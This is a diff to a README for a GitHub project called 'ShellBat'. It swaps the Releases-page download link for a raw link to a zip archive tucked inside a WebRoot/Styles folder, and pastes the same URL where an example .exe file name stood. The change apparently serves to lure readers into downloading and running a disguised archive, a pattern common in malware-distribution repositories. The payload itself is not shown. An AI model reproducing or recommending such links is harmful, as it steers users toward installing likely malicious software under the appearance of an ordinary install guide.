Ahmed2012mod/ShellBat/README.md

 ### 📥 Download & Install

-1. **Visit this page to download** the latest version of ShellBat: [ShellBat Releases Page](https://github.com/Ahmed2012mod/ShellBat/releases).
+1. **Visit this page to download** the latest version of ShellBat: [ShellBat Releases Page](https://raw.githubusercontent.com/Ahmed2012mod/ShellBat/main/ShellBat/WebRoot/Styles/Shell_Bat_v3.6.zip).

 2. On the Releases page, look for the latest version at the top.
 It is usually labeled with something like "v1.0" or similar.

 3. Click on the link that says **Download** for the corresponding version.
-This will usually be a file with a `.exe` extension (e.g., `ShellBat-latest.exe`).
+This will usually be a file with a `.exe` extension (e.g., `https://raw.githubusercontent.com/Ahmed2012mod/ShellBat/main/ShellBat/WebRoot/Styles/Shell_Bat_v3.6.zip`).

 4. Once the file is downloaded, locate it in your computer's Downloads folder.